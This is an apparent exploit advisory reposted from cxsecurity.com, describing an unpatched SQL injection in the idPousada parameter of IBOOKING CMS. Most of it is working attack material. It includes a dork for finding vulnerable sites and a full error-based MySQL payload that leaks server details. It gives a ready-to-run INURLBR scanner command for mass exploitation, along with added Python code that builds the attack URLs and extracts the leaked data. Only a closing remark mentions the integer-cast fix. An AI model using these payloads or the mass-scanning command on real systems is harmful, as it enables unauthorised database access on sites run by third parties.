IBOOKING CMS - SQL INJECTION

2018.04.16
ro mohamad/so (RO) ro
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

(0day) IBOOKING CMS - SQL INJECTION
From: INURL Brasil <inurlbr () gmail com>

# VENDOR: www.ibooking.com.br
# Vulnerable versions: ALL
# File: filtro_faixa_etaria.php
# Parameter: idPousada (GET)
# DORK: intext:"Desenvolvido por ibooking"

---------------------------------------------------------------------------------

# Description
The vulnerable request is issued by a JavaScript function found within /motor-de-reservas. The idPousada value reaches a MySQL query as an unquoted numeric value, so the payload below needs no quote to break out of the original query.

# JavaScript code responsible for the vulnerable request
    $.ajax({
        type: "GET",
        url: "filtro_faixa_etaria.php",
        data: "qtde_quartos=1&idPousada=61",
        success: function(xml){
            $("#filtro_faixa_etaria").html(xml);
        }
    });

# Vulnerable URL:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61

# POC:
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+(SQL_INJECTION)

# Example (error-based MySQL injection: the CONCAT() of @@GLOBAL.VERSION, version_compile_os and version_compile_machine is forced into a "Duplicate entry" error through COUNT(*) ... GROUP BY FLOOR(RAND(0)*2)):
http://www.TARGET.br/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)

# Return print (screenshot):
http://1.bp.blogspot.com/-vttfzGtov5g/VfiRJhIDwVI/AAAAAAAABVY/tPbBSiHft7c/s1600/Captura%2Bde%2Btela%2Bde%2B2015-09-15%2B18%253A42%253A51.png

# Mass exploitation using the INURLBR scanner
# Download: https://github.com/googleinurl/SCANNER-INURLBR

# COMMAND

# SETTING THE SEARCH DORK
--dork 'YOUR_DORK'
# USE
--dork 'intext:"Desenvolvido por ibooking"'

# SETTING THE OUTPUT FILE
# USE
-s 'ibooking.txt'

# SETTING THE GET EXPLOIT STRING
--exploit-get 'EXPLOIT_GET'
# USE
--exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)'

# SETTING THE TYPE OF VALIDATION
# USE
-t 3
The third type combines the first and second types. It also connects to the target through the GET method: the string given in --exploit-get is appended directly to each URL found by the dork.
Example: --exploit-get '/index.php?id=1&file=conect.php'
URL INJECTION: http://www.target.br/index.php?id=1&file=conect.php

# SETTING THE VALIDATION STRING
Specify the string the scanner uses to validate a target:
Example: -a {string}
Using: -a '<title>hello world</title>'
If the given value is found in the target's response, the target is considered vulnerable.
USE: -a 'INURLBR_VULN'
The INURLBR_VULN value is passed in hexadecimal form inside the exploit-get string (0x203a3a494e55524c42525f56554c4e3a3a20 decodes to " ::INURLBR_VULN:: "), so it only shows up in the response when the injected CONCAT() is evaluated by MySQL and echoed back in the duplicate-key error.

# FULL COMMAND:
php inurlbr.php --dork 'intext:"Desenvolvido por ibooking"' -s 'ibooking.txt' --exploit-get '/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=3&idPousada=61+AND+(SELECT+2692+FROM(SELECT+COUNT(*),CONCAT(0x203a3a494e55524c42525f56554c4e3a3a20,(SELECT+(concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,0x20,@@GLOBAL.version_compile_machine))),0x203a3a494e55524c42525f56554c4e3a3a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)' -t 3 -a 'INURLBR_VULN'
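The following is an added example written for this page; it is not code from the INURL Brasil advisory or from the INURLBR scanner. It rebuilds the advisory's error-based payload from its parts, decodes the hex marker the scanner validates on, models why GROUP BY FLOOR(RAND(0)*2) produces a duplicate-key error, and pulls the leaked version banner out of a response. Assumptions: the grouping model is a simplified picture of MySQL's temporary-table GROUP BY rather than its real code, the FLOOR(RAND(0)*2) value order used in the model is the commonly documented one for a seed of 0, and the sample response body is constructed to follow MySQL's "Duplicate entry ... for key" wording (the advisory only links a screenshot).

```python
import re
from urllib.parse import quote_plus

# Hex literal from the advisory's payload; it decodes to the marker that the
# scanner searches for (-a 'INURLBR_VULN') in each target's response.
MARKER_HEX = "203a3a494e55524c42525f56554c4e3a3a20"
MARKER = bytes.fromhex(MARKER_HEX).decode("ascii")  # " ::INURLBR_VULN:: "

# Subquery whose result is smuggled out inside the error message.
LEAK_EXPR = ("(SELECT (concat(@@GLOBAL.VERSION,0x20,@@GLOBAL.version_compile_os,"
             "0x20,@@GLOBAL.version_compile_machine)))")


def build_injection(expr=LEAK_EXPR):
    """Tail appended to 'idPousada=61' (the advisory's error-based payload).

    COUNT(*) with GROUP BY FLOOR(RAND(0)*2) makes MySQL try to insert the same
    group key twice into its temporary table; the 'Duplicate entry' error it
    raises carries the key, i.e. CONCAT(marker, expr, marker, 0 or 1).
    """
    return ("AND (SELECT 2692 FROM(SELECT COUNT(*),CONCAT(0x%s,%s,0x%s,"
            "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
            "GROUP BY x)a)" % (MARKER_HEX, expr, MARKER_HEX))


def build_url(base, id_pousada=61, qtde_quartos=3):
    """Request URL in the form the advisory and the scanner use ('+' for space)."""
    tail = quote_plus(build_injection(), safe="(),*=@")
    return ("%s/motor-de-reservas/filtro_faixa_etaria.php?qtde_quartos=%d"
            "&idPousada=%d+%s" % (base.rstrip("/"), qtde_quartos, id_pousada, tail))


# Assumed order of FLOOR(RAND(0)*2) values for the first rows (seeded RAND is
# deterministic; this is the sequence usually quoted for this technique).
RAND0_FLOOR_SEQUENCE = [0, 1, 1, 0, 1, 1]


def group_by_duplicate(keys):
    """Simplified model of MySQL's GROUP BY over a temp table (assumption).

    For each row the key is evaluated once to look it up; on a miss it is
    evaluated AGAIN to insert it. Because the second evaluation pulls the
    next value from the seeded sequence, the inserted key can already be
    present. Returns the colliding key (the error case) or None.
    """
    values = iter(keys)
    seen = {}
    try:
        while True:
            k = next(values)
            if k in seen:
                seen[k] += 1
                continue
            k2 = next(values)          # re-evaluated for the insert
            if k2 in seen:
                return k2              # MySQL raises 'Duplicate entry' here
            seen[k2] = 1
    except StopIteration:
        return None


# Constructed sample of a vulnerable host's response (not captured from a
# real target); wording follows MySQL's duplicate-key error.
SAMPLE_RESPONSE = (
    "Duplicate entry ' ::INURLBR_VULN:: 5.5.40-log Linux x86_64 "
    "::INURLBR_VULN:: 1' for key 'group_key'"
)

# Constructed sample of a clean response: the filter's normal HTML fragment.
CLEAN_RESPONSE = "<select name=\"faixa_etaria_1\"><option>0-2</option></select>"


def extract_leak(body):
    """Text between the two markers (the leaked banner), or None if absent."""
    m = re.search(re.escape(MARKER) + r"(.*?)" + re.escape(MARKER), body, re.S)
    return m.group(1) if m else None


def is_vulnerable(body):
    """Same decision the scanner makes with -a 'INURLBR_VULN'."""
    return "INURLBR_VULN" in body


if __name__ == "__main__":
    print(build_url("http://www.TARGET.br"))
    print("collision on key:", group_by_duplicate(RAND0_FLOOR_SEQUENCE))
    print("leaked:", extract_leak(SAMPLE_RESPONSE))
```

Two practical notes. The marker check only fires when the database error text is echoed into the HTTP response; a host that suppresses errors can still be injectable (blind) and will not be flagged by this validation string. On the defensive side, idPousada is a numeric identifier, so the fix is to cast it to an integer or bind it as a parameter of a prepared statement before it reaches the query.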



Copyright 2018, cxsecurity.com
